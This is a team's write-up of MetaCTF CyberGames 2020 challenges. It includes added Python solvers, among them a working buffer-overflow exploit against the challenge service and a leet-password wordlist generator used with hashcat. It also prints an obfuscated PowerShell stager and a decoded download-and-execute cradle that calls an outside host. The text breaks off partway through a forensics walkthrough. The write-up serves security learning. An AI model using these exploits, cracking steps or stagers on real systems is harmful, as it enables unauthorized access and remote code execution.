
MetaCTF CyberGames 2020 Writeup — Last Minute Team Name
This post is a collaborative effort between myself, Connor C., Tim E., and Tilden W. Together, we represented Northeastern University, the University of Cincinnati, the Rochester Institute of Technology, and the University of Virginia. Thanks for a great time, guys!
MetaCTF is an annual cybersecurity Capture The Flag (CTF) event, hosted online this year due to the COVID-19 pandemic. Teams of four from across the world, composed of students and non-students alike, competed for a total prize pool of $5000. The 24-hour event began on October 24 at noon Eastern time. In total, 1,587 teams registered for the event, and 995 teams scored points.
Our team was Last Minute Team Name, affiliated with the fictitious Zoom University. By the end of the challenge, we were able to earn a total of 6,750 points. Our score placed us in 36th overall, 24th among the student teams, and in the top 4% of scored teams.
Challenges and Kickoff
This year's challenges included binary exploitation, cryptography, forensics, reconnaissance, reverse engineering, multimedia, and web exploitation. We had to find buffer overflows, discover data exfiltration in network traffic, gather open-source intelligence (OSINT), brute-force passwords, analyze and detect malware, and reverse engineer audio files. There were also various trivia competitions and bonus flags released throughout the day.
This report covers the challenges we were able to submit before the competition closed. We listed the challenges per section in the order of the points they were worth. The more points awarded for a challenge, the more difficult it was to solve.
Our Strategy
Due to its remote nature, my team used a Discord server to communicate during the competition. We used one channel per challenge and organized them per category, from lowest to highest point values. We also used emojis to indicate whether we solved a challenge (✅), had attempted it but not for more than an hour (❔), or had tried it for more than an hour without any progress (❓).

In each channel, we posted the progress we had made and any details we had discovered. Doing so allowed us to rotate between challenges and quickly pick up where another team member had left off without having to ask them. If we could not solve a problem within an hour, we marked it and moved on so that another team member could attempt it later. Some of the most difficult challenges required input from all four of us before we solved them.
Binary Exploitation
The addresses and ports in this section are in Netcat syntax. Use the nc command to connect to each challenge.
Baffling Buffer 0
150 points/solved by 580 teams
While hunting for vulnerabilities in client infrastructure, you discover a strange service located at host1.metaproblems.com 5150. You’ve uncovered the binary and source code of the remote service, which looks somewhat unfinished. The code is written in a very exploitable manner. Can you find out how to make the program give you the flag?
The provided code is written in C.
#include <stdio.h>
#include <stdlib.h>

void vuln() {
    int isAuthenticated = 0;   /* never set by the program; only a stack overwrite can change it */
    char buf[48];
    puts("Enter the access code: ");
    gets(buf);                 /* no length limit: input longer than 48 bytes runs past buf */
    puts("TODO: Implement access code checking.");
    if(isAuthenticated) {
        system("/bin/cat flag.txt");
    }
    else {
        puts("Invalid auth!");
    }
}

int main() {
    setbuf(stdout, 0);         /* unbuffered I/O so prompts arrive over the socket immediately */
    setbuf(stdin, 0);
    setbuf(stderr, 0);
    vuln();
    return 0;
}
Notably, it reads input with the unsafe gets(), which has no way of knowing that buf is only 48 bytes long, and isAuthenticated is never set by the program itself; it can only become non-zero if something overwrites it. Both variables live in vuln()'s stack frame, so on this build a line of input longer than buf spills into the neighbouring memory, including isAuthenticated. Any non-zero byte landing there passes the check, so there is no need to compute an exact offset: pipe a generous run of filler into the service, for example python3 -c 'print("A"*64)' | nc host1.metaproblems.com 5150. The flag is printed by system() before vuln() returns, so it does not matter that the saved return address is clobbered as well and the process crashes afterwards.
The flag is MetaCTF{just_a_little_auth_bypass}.
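A scripted version of that overflow, added here as an example rather than the team's own solver. It assumes only what the challenge source shows: gets() into a 48-byte buffer with isAuthenticated beside it on the stack, and a flag printed as MetaCTF{...}. The hostname and port are the ones from the challenge text, and the filler length is a generous guess rather than a computed offset.

```python
import re
import socket
from typing import Optional

# Added example, not part of the original writeup. Assumptions: the remote service is the
# challenge binary above (gets() into buf[48], isAuthenticated adjacent on the stack) and
# it prints the flag as MetaCTF{...}. Host and port are the ones in the challenge text.
BUF_SIZE = 48
FLAG_RE = re.compile(rb"MetaCTF\{[^}]*\}")


def build_payload(buf_size: int = BUF_SIZE, slack: int = 32) -> bytes:
    """Filler long enough to run past buf and clobber isAuthenticated with non-zero bytes.

    gets() stops at a newline and the C string ends at NUL, so neither byte may occur in
    the filler; the newline appended at the end is what terminates the gets() call.
    """
    filler = b"A" * (buf_size + slack)
    if b"\n" in filler or b"\x00" in filler:
        raise ValueError("filler must not contain newline or NUL")
    return filler + b"\n"


def extract_flag(response: bytes) -> Optional[str]:
    """Pull the flag out of whatever the service sent back, or None if auth failed."""
    m = FLAG_RE.search(response)
    return m.group(0).decode() if m else None


def recv_all(sock: socket.socket, limit: int = 65536) -> bytes:
    """Read until the peer closes or times out; the service exits right after printing."""
    data = b""
    while len(data) < limit:
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        data += chunk
    return data


def exploit(host: str = "host1.metaproblems.com", port: int = 5150) -> Optional[str]:
    with socket.create_connection((host, port), timeout=5.0) as s:
        s.recv(4096)                  # "Enter the access code: "
        s.sendall(build_payload())
        return extract_flag(recv_all(s))


if __name__ == "__main__":
    print(exploit())
```

Run it as python3 exploit.py against the live service; extract_flag() is kept separate so the response parsing can be checked without a network.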
Cryptography
Crypto Stands For Cryptography
100 points/solved by 932 teams
Welcome to the crypto team! We help consult in a variety of areas around the security department, helping to make sure our company is using proper encryption, data storage, and data transfer mechanisms.
The data security team said they currently use something called Base64 to “encrypt” data. They want to know if that’s a secure way to store sensitive data, and provided a sample of data:
TWV0YUNURntiYXNlNjRfZW5jMGRpbmdfaXNfbjB0X3RoZV9zYW1lX2FzX2VuY3J5cHRpMG4hfQ==
Is it secure? Can you crack it?
Base64 is a reversible encoding with no key, so anyone holding the data can decode it; it provides no confidentiality at all. CyberChef's From Base64 operation converts the sample back to plaintext:
The flag is MetaCTF{base64_enc0ding_is_n0t_the_same_as_encrypti0n!}.
ROT 26
150 points/solved by 707 teams
We’ve applied some encoding to obfuscate our messages. There’s no way you can figure out the original message now?! I applied the unbreakable ROT 26 algorithm:
g!0{]n`7*+0y~+1|(!y.+0yKM9
ROT 26 over the 26-letter alphabet would be the identity, which is the joke in the challenge name, and the ciphertext contains characters such as { and ~ that a letter-only cipher would never produce. The shift is actually applied over the 94 printable ASCII characters (the alphabet ROT47 uses), so "ROT 26" is a shift of 26 positions in that alphabet, and shifting back by 26 recovers the message. dCode is a great website for cracking many different kinds of classical ciphers, and its ROT brute-forcer tries every shift and returns the readable one. Here, it was used to brute-force the "ROT 26" ciphertext.
The flag is MetaCTF{not_double_rot_13}.
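The same brute force in a few lines of Python, added as an example (it is not the team's solution and does not depend on dCode). The only assumption is the alphabet: the 94 printable ASCII characters, which the curly brace and tilde in the ciphertext force.

```python
from typing import List, Tuple

# Added example, not from the writeup. "ROT 26" over the 26-letter alphabet would change
# nothing, and the ciphertext contains '{', '`' and '~', so the shift must run over a
# larger alphabet: the 94 printable ASCII characters 0x21..0x7E that ROT47 also uses.
# Shifting those by 26 is the "unbreakable ROT 26"; shifting back (or forward by 68)
# undoes it. The brute force tries all 94 shifts and keeps the ones that look like a flag.
PRINTABLE_LO, PRINTABLE_HI = 0x21, 0x7E
ALPHABET_SIZE = PRINTABLE_HI - PRINTABLE_LO + 1   # 94

CIPHERTEXT = "g!0{]n`7*+0y~+1|(!y.+0yKM9"       # from the challenge text


def rot_printable(text: str, shift: int) -> str:
    """Shift every printable ASCII character by `shift` positions (mod 94); leave the rest alone."""
    out = []
    for ch in text:
        code = ord(ch)
        if PRINTABLE_LO <= code <= PRINTABLE_HI:
            code = PRINTABLE_LO + (code - PRINTABLE_LO + shift) % ALPHABET_SIZE
        out.append(chr(code))          # spaces and non-printables pass through unchanged
    return "".join(out)


def brute_force(ciphertext: str, marker: str = "MetaCTF{") -> List[Tuple[int, str]]:
    """Every (shift, plaintext) pair whose plaintext contains the expected flag prefix."""
    hits: List[Tuple[int, str]] = []
    for shift in range(ALPHABET_SIZE):
        plaintext = rot_printable(ciphertext, shift)
        if marker in plaintext:
            hits.append((shift, plaintext))
    return hits


if __name__ == "__main__":
    for shift, plaintext in brute_force(CIPHERTEXT):
        print(f"shift {shift:2d} (i.e. ROT -{ALPHABET_SIZE - shift}): {plaintext}")
```

Because the alphabet has 94 symbols, a shift of 68 and a shift of -26 are the same operation; ROT47 is the special case shift = 47, which is its own inverse.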
Welcome to the Obfuscation Games!
175 points/solved by 600 teams
During a recent incident response investigation, we came across this suspicious command executed by an attacker, and we’d like you to analyze it. Malware authors like to obfuscate their payloads to make it harder, but we’re sure you’re up to the task. See if you can figure out what’s happening without even running it!
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
Reading the command from the inside out: [Convert]::FromBase64String turns the blob back into bytes, IO.Compression.GzipStream wraps those bytes in a decompressing stream, StreamReader.ReadToEnd() turns the decompressed bytes into text, and IEX (Invoke-Expression) executes that text as PowerShell. Everything before IEX is pure data transformation, so the payload can be recovered without running anything: base64-decode the string with a simple online tool (or base64 -d) and save the result as a .gz file.
Unzip the .gz file with any compatible extraction software (gunzip works), and inside is a text file containing the flag MetaCTF{peeling_back_the_flag_one_code_at_a_time}.
The Last Great ZIP File
200 points/solved by 472 teams
Help! I’ve created a zip archive that contains my favorite flag, but I forgot the password to it. Can you help me recover my flag back?
You may need another program, such as wget, to download the file if your browser blocks the download. fcrackzip attacks the archive's password directly, so there is no hash to extract first. Use it with the rockyou.txt wordlist (included on Kali):
sudo apt-get install fcrackzip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt flag.zip
-D selects dictionary mode, -p names the wordlist, and -u makes fcrackzip verify each candidate by actually unzipping, which avoids the false positives its quick check otherwise reports. Note that fcrackzip only handles the traditional PKZIP (ZipCrypto) scheme; for AES-encrypted archives, extract a hash with zip2john and crack it with john or hashcat instead.
Now use the password to extract the archive. An image file comes out:
The flag is MetaCTF{crack_the_planet}.
Board Meeting Gone Wrong
325 points/solved by 70 teams
I stole this sensitive document that contains some really important board notes. I have a feeling I can get some serious insight on stonks here.
There are a few things I know about the person I stole it from. He likes animals, he likes to speak like he’s a hacker to make himself seem cool, and he was born in 1972. I hope that helps.
Can you help me crack it? I will make sure to share some of the profits.
First, get the hash of the document using Office2John:
python office2john.py Board_Meeting_Notes.docx
Now, create the wordlist to use with Hashcat. Based on the hint, we believe that the password:
- Contains an animal name in leet
- Contains the contiguous string "1972", probably at the start or end
- May have the first letter capitalized
We found a large list of animal names on GitHub (animals.txt) and translated them into leet with WordListGen, creating an animals-1337.txt file.
Then we prepended 1972 to each line of a copy of animals-1337.txt, creating animals-1337-start.txt, and appended 1972 to each line of another copy, creating animals-1337-end.txt. We also created a version of each file in which each line started with a lowercase letter (the animal list from GitHub used capitalized names). All of these transformations can be done with awk or sed.
Merging the files gives us the dictionary to use for cracking the password:
!!@m@1972
!08$+3r1972
!0ng-3@r3d 0w!1972
!1++!3 P3ngu1n1972
!10n1972
!10nf1$h1972
!12@rd1972
!1g3r1972
!30p@rd1972
…
Using our dictionary with Hashcat gives us the password: d0lph1n1972. (The mode to pass with -m comes from the prefix of the hash office2john printed: $office$*2007*, *2010* and *2013* correspond to 9400, 9500 and 9600.)
Opening the file gives the flag: MetaCTF{not_all_meetings_are_secret}.
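The dictionary generation as a script, added here as an example rather than the WordListGen-plus-awk pipeline the team actually used. The leet table is an assumption read off the sample lines above, and the animal names are a constructed stand-in for animals.txt.

```python
import itertools
from typing import Dict, Iterable, List, Set

# Added example, not the team's WordListGen/awk pipeline. The substitution table is
# inferred from the sample lines above (l->!, o->0, b->8, s->$, t->+, e->3, i->1, a->@,
# z->2) and is an assumption; WordListGen's own table may differ. Each substitutable
# letter may be kept or replaced, which is what makes "d0lph1n" (l kept) appear.
LEET: Dict[str, List[str]] = {
    "a": ["@"], "b": ["8"], "e": ["3"], "i": ["1"], "l": ["!", "1"],
    "o": ["0"], "s": ["$"], "t": ["+", "7"], "z": ["2"],
}


def leet_variants(word: str, table: Dict[str, List[str]] = LEET) -> Set[str]:
    """All spellings of `word` with each substitutable letter either kept or replaced."""
    choices = [[ch] + table.get(ch, []) for ch in word.lower()]
    return {"".join(combo) for combo in itertools.product(*choices)}


def candidates(animals: Iterable[str], year: str) -> Set[str]:
    """Leet variants x {lowercase, capitalised} x {year prefix, year suffix}."""
    out: Set[str] = set()
    for animal in animals:
        for variant in leet_variants(animal.strip()):
            if not variant:
                continue
            for cased in (variant, variant[:1].upper() + variant[1:]):
                out.add(year + cased)
                out.add(cased + year)
    return out


def write_wordlist(path: str, words: Iterable[str]) -> int:
    """Write one candidate per line, sorted and de-duplicated; returns the line count."""
    unique = sorted(set(words))
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(unique) + "\n")
    return len(unique)


# Constructed stand-in for animals.txt.
ANIMALS = ["Dolphin", "Llama", "Lobster", "Leopard", "Tiger"]

if __name__ == "__main__":
    words = candidates(ANIMALS, "1972")
    print(len(words), "candidates;", "d0lph1n1972" in words)
    write_wordlist("animals-1337-1972.txt", words)
```

The variant count grows as the product of the per-letter choices, so for a long animal list it is worth pruning the table to the substitutions the hint actually supports before feeding the file to hashcat with the -m mode matching the office2john hash prefix.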
Forensics
I did most of these forensics challenges on SIFT Workstation.
Forensics 101
100 points/solved by 839 teams
Sometimes in forensics we run into files that have odd or unknown file extensions.
In these cases it’s helpful to look at some of the file format signatures to figure out what they are. We use something called “magic bytes” which are the first few bytes of a file.
What is the ASCII representation of the magic bytes for a RAR archive?
"Magic bytes" is another term for a file signature, a fixed sequence of bytes at the beginning of a file that identifies its format. Tools such as the Unix file command identify types by signature, whereas Windows Explorer picks the application to open a file by its extension, the short string after the last dot in the filename; some Windows programs and web applications sniff the signature as well.
A signature is more reliable than an extension, since renaming a file changes the extension but not its contents, but neither is trustworthy on its own: an attacker controls both, and a mismatch between them (as in the next challenge) is itself a useful indicator. Signatures are also what steganography detection and file carving rely on. If an analyst suspects that a file is hiding inside another, and neither file is encrypted or encoded, many forensics tools can locate the embedded file by finding a foreign signature inside the host file and carve it out.
Wikipedia keeps a list of file signatures. According to the list, a RAR archive begins with the bytes 52 61 72 21 1A 07 00 (RAR 1.5 to 4.x; RAR 5 ends the signature with 01 00 instead), whose printable ASCII portion is Rar!… . This is the flag.
Staging in 1…2…3
150 points/solved by 737 teams
The Incident Response (IR) team identified evidence that a Threat Actor accessed a system that contains sensitive company information. The Chief Information Security Officer (CISO) wants to know if any data was accessed or taken.
There was a suspicious file created during the timeframe of Threat Actor activity:
C:\123.tmp. Can you check it out?
If you were to download the provided file, it would appear like this in Windows:
Because Windows goes by the extension, as discussed above, the OS treats this as a temporary file. However, we know better. Open the file on Linux.
Linux desktop environments will usually recognise the file type (an archive) from its signature, but run the file command on it to be sure. The output identifies a RAR archive, the same format we just looked at. It can be extracted via the GUI, but I prefer the terminal (for example unrar x 123.tmp; unrar does not care about the extension).
Now that the correct file type has been identified and the contents extracted, the flag is clearly visible:
MetaCTF{definitely_n0t_all_0f_y0ur_sensitive_data}
To do this in Windows, rename the file to 123.rar; you may need a third-party application such as 7-Zip or WinRAR to extract it.
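Checking signatures in code, added as an example covering both Forensics 101 and this challenge (it is not part of the writeup). The signatures are the standard published ones; the extension sets used for the mismatch check and the sample bytes are constructed assumptions.

```python
from typing import List, Optional, Set, Tuple

# Added example (not from the writeup). Signatures are the well-known ones from the public
# file-signature lists; the extension sets are an assumption about which names are normal
# for each format. Longer magics come first so RAR5 is not reported as RAR4.
SIGNATURES: List[Tuple[bytes, str, Set[str]]] = [
    (b"Rar!\x1a\x07\x01\x00", "RAR archive (v5)", {"rar"}),
    (b"Rar!\x1a\x07\x00", "RAR archive (v1.5-4.x)", {"rar"}),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE compound document", {"doc", "xls", "ppt", "pub", "msi", "msg"}),
    (b"\x89PNG\r\n\x1a\n", "PNG image", {"png"}),
    (b"7z\xbc\xaf\x27\x1c", "7-Zip archive", {"7z"}),
    (b"%PDF-", "PDF document", {"pdf"}),
    (b"PK\x03\x04", "ZIP archive", {"zip", "docx", "xlsx", "pptx", "jar", "apk"}),
    (b"\x7fELF", "ELF executable", {"elf", "so", "o"}),
    (b"\xff\xd8\xff", "JPEG image", {"jpg", "jpeg"}),
    (b"\x1f\x8b", "gzip stream", {"gz", "tgz"}),
    (b"MZ", "DOS/PE executable", {"exe", "dll", "sys", "scr"}),
]


def identify(data: bytes) -> Optional[Tuple[str, Set[str]]]:
    """Name the format from the leading bytes, or None if no signature matches."""
    for magic, name, exts in SIGNATURES:
        if data.startswith(magic):
            return name, exts
    return None


def extension_mismatch(filename: str, data: bytes) -> Optional[str]:
    """Describe a disagreement between the extension and the magic bytes, else None."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    found = identify(data)
    if found is None:
        return None
    name, exts = found
    if ext in exts:
        return None
    return f"{filename}: extension .{ext} but content is {name}"


def find_embedded(data: bytes) -> List[Tuple[int, str]]:
    """Naive carving pass: every signature that occurs after offset 0.

    Two- and three-byte magics (MZ, gzip, JPEG) are skipped because they occur by
    chance in almost any file; a real carver validates the header that follows.
    """
    hits: List[Tuple[int, str]] = []
    for magic, name, _ in SIGNATURES:
        if len(magic) < 4:
            continue
        start = 1
        while (idx := data.find(magic, start)) >= 0:
            hits.append((idx, name))
            start = idx + 1
    return sorted(hits)


# Constructed inputs standing in for the challenge files.
RAR_LIKE_TMP = b"Rar!\x1a\x07\x00" + b"\x00" * 32            # shape of 123.tmp from this challenge
PNG_WITH_ZIP = b"\x89PNG\r\n\x1a\n" + b"\x00" * 100 + b"PK\x03\x04" + b"\x00" * 20

if __name__ == "__main__":
    print(identify(RAR_LIKE_TMP))
    print(extension_mismatch("123.tmp", RAR_LIKE_TMP))
    print(find_embedded(PNG_WITH_ZIP))
```

The same check run over a whole directory listing is a cheap triage step in an intrusion: a .tmp or .log whose content is an archive, or an OLE document sitting under a .jpg name, is worth a second look before anything else.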
Publish3r
225 points/solved by 430 teams
We believe we found a malicious file on someone’s workstation. Judging by looking at it, the file likely came from a phishing email. Anyways, we’d like you to analyze the sample, so we can see what would have happened if it executed successfully. That way we can hunt for signs of it across the enterprise. Your flag will be the URL that the malware is trying to reach out to! Can you do it? Format: MetaCTF{http://.........}
Note: We’ve put the actual file in an encrypted 7z so your browser doesn’t complain when downloading it (and our site doesn’t get flagged as malware). The password is metactf.
Once again, the file is compressed, this time with 7-Zip. Extract it:
7z x Publish3r.7z
This time, the file extension matches the magic bytes: file reports a Microsoft Publisher document (a .pub file, which is an OLE compound document like the older .doc and .xls formats).
As this is an easier forensics challenge, basic static analysis is a sensible start. Run strings on the extracted document (not on the 7z, which is encrypted and yields nothing useful; adjust the filename to whatever 7z extracted).  Office-format files frequently store text as UTF-16, so run it a second time with -e l to catch little-endian 16-bit strings:
strings Publish3r.pub > strings.txt
strings -e l Publish3r.pub >> strings.txt
Open strings.txt and look for anything suspicious. Among the many strange things in this Publisher document, it most certainly should not be invoking Windows PowerShell. The PowerShell command line carries an encoded argument, though. I’ll use CyberChef’s Magic operation to figure out what it is.
Ah! Base64. Now use CyberChef’s Base64 decoder.
The decoded command is:
IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))
Therefore, the flag is MetaCTF{http://13.37.10.10:4443/doc/payload.ps1}
.
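An offline decoder for both obfuscated commands in this writeup (the gzip-over-base64 stager from Welcome to the Obfuscation Games! and the base64-encoded PowerShell from this challenge), added as an example and not the authors' code. It embeds a constructed stager pointing at a documentation address rather than the real payloads; the UTF-16LE handling assumes a blob produced for powershell -EncodedCommand, which is the convention for that switch. Feeding the base64 strings quoted above to analyse() applies the same steps to the real samples.

```python
import base64
import gzip
import re
from typing import Dict, List

# Added example, not the challenge authors' code. It statically unwraps the two stager
# shapes seen in this writeup (gzip-over-base64 handed to IEX, and a plain base64 blob
# on a PowerShell command line) and pulls out any URLs, without executing anything.
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")


def unwrap_gzip_b64(b64: str) -> str:
    """Undo FromBase64String -> GzipStream(Decompress) -> StreamReader.ReadToEnd()."""
    raw = base64.b64decode(b64, validate=True)
    if raw[:2] != b"\x1f\x8b":            # gzip magic; anything else is not a GzipStream payload
        raise ValueError("not a gzip stream")
    return gzip.decompress(raw).decode("utf-8", errors="replace")


def decode_powershell_b64(b64: str) -> str:
    """Decode a base64 blob as the stager would see it.

    powershell -EncodedCommand expects UTF-16LE (assumption: recognised here by the NUL
    in every second byte of ASCII text); anything else is treated as UTF-8.
    """
    raw = base64.b64decode(b64, validate=True)
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def extract_urls(script: str) -> List[str]:
    return sorted(set(URL_RE.findall(script)))


def analyse(b64: str) -> Dict[str, object]:
    """Pick the decoding layer from the magic bytes, then report the script and its URLs."""
    raw = base64.b64decode(b64, validate=True)
    if raw[:2] == b"\x1f\x8b":
        script, layer = unwrap_gzip_b64(b64), "gzip+base64"
    else:
        script, layer = decode_powershell_b64(b64), "base64"
    return {"layer": layer, "script": script, "urls": extract_urls(script)}


# Constructed samples (not the challenge payloads): the same shapes as the two commands
# in the writeup, built here so the script runs offline. 192.0.2.10 is a documentation address.
STAGE_SCRIPT = 'IEX ((New-Object Net.WebClient).DownloadString("http://192.0.2.10:8080/stage.ps1"))'
SAMPLE_GZIP_B64 = base64.b64encode(gzip.compress(STAGE_SCRIPT.encode())).decode()
SAMPLE_UTF16_B64 = base64.b64encode(STAGE_SCRIPT.encode("utf-16-le")).decode()

if __name__ == "__main__":
    for sample in (SAMPLE_GZIP_B64, SAMPLE_UTF16_B64):
        print(analyse(sample))
```

The URL list is what goes into the hunt across the enterprise; the decoded script is worth reading in full as well, since a second stage often carries its own encoded layer and analyse() can simply be run again on it.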
Open Thermal Exhaust Port
275 points/solved by 416 teams
Our TCP connect Nmap scan found some open ports it seems. We may only have a pcap of the traffic, but I’m sure that won’t be a problem! Can you tell us which ones they are?
The flag will be the sum of the open ports. For example, if ports 25 and 110 were open, the answer would be MetaCTF{135}.
This challenge presents a packet capture (.pcap file) that can be analyzed with Wireshark. There are two IP addresses: 10.0.2.6 and 10.0.2.15. Nmap is a port scanner, so if you know the TCP three-way handshake, you will know that the host sending a stream of packets with only the SYN (synchronize) flag set is the one running Nmap, and the host frequently answering with RST, ACK (reset, acknowledge) is the target.
Based on this, 10.0.2.15 is the scanner and 10.0.2.6 is the target. The target answers RST, ACK when the destination port is closed and SYN, ACK when it is open, which is how Nmap identifies open ports (assuming no firewall or IPS in the path; a filtered port simply never answers).
Now we need to find the ports from which the target returns SYN, ACK. A display filter for packets sourced from 10.0.2.6 with exactly the SYN and ACK bits set (ip.src == 10.0.2.6 && tcp.flags == 0x12, or equivalently tcp.flags.syn == 1 && tcp.flags.ack == 1) narrows the results down significantly.
In the Info column, the port on the left is the source port and the port on the right is the destination port. We care about the source port because the traffic we filtered originates from the target. The capture contains duplicate SYN, ACK replies, so count each port once; adding up the seven distinct open ports gives the flag.
80 (HTTP) + 443 (HTTPS) + 23 (Telnet) + 21 (FTP) + 53 (DNS) + 22 (SSH) + 3128 (Squid proxy) = 3770
MetaCTF{3770}
I was hoping for 1337, but that might’ve been too obvious of a flag.
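The same open-port logic as a script over the raw pcap, added as an example (not the team's Wireshark workflow). It handles only the classic little-endian pcap format with Ethernet/IPv4/TCP frames, which is what a scan captured on a VM looks like, and it runs here against a capture it constructs itself rather than the challenge file.

```python
import struct
from collections import Counter, defaultdict
from typing import Dict, Iterator, List, Set, Tuple

# Added example, not the challenge authors' code. A minimal classic-pcap/Ethernet/IPv4/TCP
# reader that applies the same logic as the Wireshark filter above: the host sending bare
# SYNs is the scanner, and every distinct source port from which the target answers
# SYN/ACK is open. The capture it runs on here is constructed below, not the challenge file.
SYN, RST, ACK = 0x02, 0x04, 0x10
PCAP_MAGIC = 0xA1B2C3D4        # little-endian, microsecond-resolution pcap

Packet = Tuple[str, str, int, int, int]   # src_ip, dst_ip, sport, dport, tcp_flags


def iter_tcp(pcap: bytes) -> Iterator[Packet]:
    magic, = struct.unpack_from("<I", pcap, 0)
    linktype, = struct.unpack_from("<I", pcap, 20)
    if magic != PCAP_MAGIC or linktype != 1:
        raise ValueError("expected a little-endian classic pcap with Ethernet frames")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from("<IIII", pcap, off)
        frame = pcap[off + 16: off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # not IPv4
            continue
        ihl = (frame[14] & 0x0F) * 4
        if frame[23] != 6:                                     # not TCP
            continue
        tcp = frame[14 + ihl:]
        if len(tcp) < 14:
            continue
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        sport, dport = struct.unpack_from(">HH", tcp, 0)
        yield src, dst, sport, dport, tcp[13]


def open_ports(pcap: bytes) -> Dict[str, object]:
    syn_senders: Counter = Counter()
    synack_ports: Dict[str, Set[int]] = defaultdict(set)
    for src, dst, sport, dport, flags in iter_tcp(pcap):
        core = flags & (SYN | ACK | RST)
        if core == SYN:
            syn_senders[src] += 1              # bare SYN: a probe from the scanner
        elif core == SYN | ACK:
            synack_ports[src].add(sport)       # SYN/ACK: the target admits the port is open
    if not syn_senders:
        raise ValueError("no SYN probes in capture")
    scanner = syn_senders.most_common(1)[0][0]
    target = max(synack_ports, key=lambda ip: len(synack_ports[ip]), default=None)
    ports = sorted(synack_ports[target]) if target else []   # the set already drops duplicates
    return {"scanner": scanner, "target": target, "open_ports": ports, "flag_sum": sum(ports)}


# --- constructed capture (stand-in for the challenge pcap) ---------------------------------
def _frame(src: str, dst: str, sport: int, dport: int, flags: int) -> bytes:
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 40, 0, 0x4000, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack(">HHIIBBHHH", sport, dport, 0, 0, 0x50, flags, 65535, 0, 0)
    return eth + ip + tcp


def build_pcap(frames: List[bytes]) -> bytes:
    out = [struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)]
    for i, f in enumerate(frames):
        out.append(struct.pack("<IIII", 1603555200 + i, 0, len(f), len(f)) + f)
    return b"".join(out)


def sample_scan() -> bytes:
    """10.0.2.15 connect-scans 10.0.2.6 on four ports; three are open (constructed data)."""
    a, t = "10.0.2.15", "10.0.2.6"
    frames: List[bytes] = []
    for i, (port, is_open) in enumerate([(22, True), (80, True), (443, True), (8080, False)]):
        cp = 40000 + i
        frames.append(_frame(a, t, cp, port, SYN))
        if is_open:
            frames.append(_frame(t, a, port, cp, SYN | ACK))
            frames.append(_frame(a, t, cp, port, ACK))        # connect scan completes the handshake
            frames.append(_frame(a, t, cp, port, RST | ACK))  # ...then tears it down
        else:
            frames.append(_frame(t, a, port, cp, RST | ACK))  # closed port
    frames.append(_frame(t, a, 80, 40001, SYN | ACK))          # duplicate reply: must not double count
    return build_pcap(frames)


if __name__ == "__main__":
    print(open_ports(sample_scan()))
```

Only the SYN/ACK replies count, and they are collected into a set keyed by the target's source port, which is exactly the de-duplication step done by eye in Wireshark above. A pcapng capture or a VLAN-tagged frame would need a different reader.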
Mystery C2
325 points/solved by 157 teams
Our threat intel team detected some malicious Command-and-Control traffic in our network. Can you identify what C2 framework the threat actor is using?
You only have 5 attempts for this one.
This challenge includes another .pcap file. Upload it to PacketTotal for a high-level picture of what the malware is doing (fine for a CTF artifact; for a real incident, analyse the capture locally rather than handing it to a third-party service).
The malware sends many packets from 10.0.2.15 (an RFC 1918 private address) to 8.8.4.4, Google's secondary public DNS resolver, on TCP port 443 (HTTPS) rather than UDP port 53. DNS traffic to a public resolver over 443 is the signature of DNS over HTTPS. Which C2 frameworks tunnel their traffic over DoH through Google's resolver?
A quick search reveals that this C2 is most likely goDoH.
Just in Time
375 points/solved by 20 teams (we were the first team to solve!)
Time is running out, and we need your help! Our team has managed to recover a hard drive from a suspect’s computer, and we think there may be information pertaining to the location of an upcoming meet. Unfortunately, the user almost certainly uses an encrypted messaging program when communicating sensitive info.
We’re hoping to recover the address of the meet, which is the flag. Please enter just the street number and road, for example, 123 Easy Street. Also, to make the file download more manageable, we’re giving you just the Users folder with some large (and irrelevant) files deleted. You can download the Users folder here.
Even though the message was purportedly encrypted, there is still the possibility that the operating system or program cached it before it was sent. If the cache hasn’t yet been cleared, it should be possible to recover the message if you know where to look. There are a few locations where the message might still be available:
- The operating system, because it handles all keyboard input
- The web browser, if the encrypted chat application is web-based
- A client application for the chat service that was used to send the message
I will use FTK Imager for this challenge because it provides a simple method for organizing system files and applying forensic techniques.
There is only one user present on the system (excluding the default accounts), Xiang Zhi. Starting with the operating system, browse to C:\Users\Xiang Zhi\AppData\Local\Microsoft\InputPersonalization\TextHarvester\. When Input Personalization is enabled, this folder holds TextHarvester.dat, the store of typed text that Windows uses to adapt the user's language model and dictionary, and it occasionally captures sensitive keystrokes. Unfortunately, the folder is empty, so the feature must not have been enabled.
Moving on to the browser, C:\Users\Xiang Zhi\AppData\Local\Google
shows that Google Chrome is installed. Let’s use Hindsight to learn about Zhi’s web browsing activities.
They downloaded Wire-Setup.exe, which is the installer for the Wire encrypted messaging app. Unfortunately, there are no credentials, nor is there an address. We will have to inspect the application data itself.
If we continue looking around in the C:\Users\Xiang Zhi\AppData
folder, we find a Wire folder under C:\Users\Xiang Zhi\AppData\Roaming
. What files or folders have been edited recently?
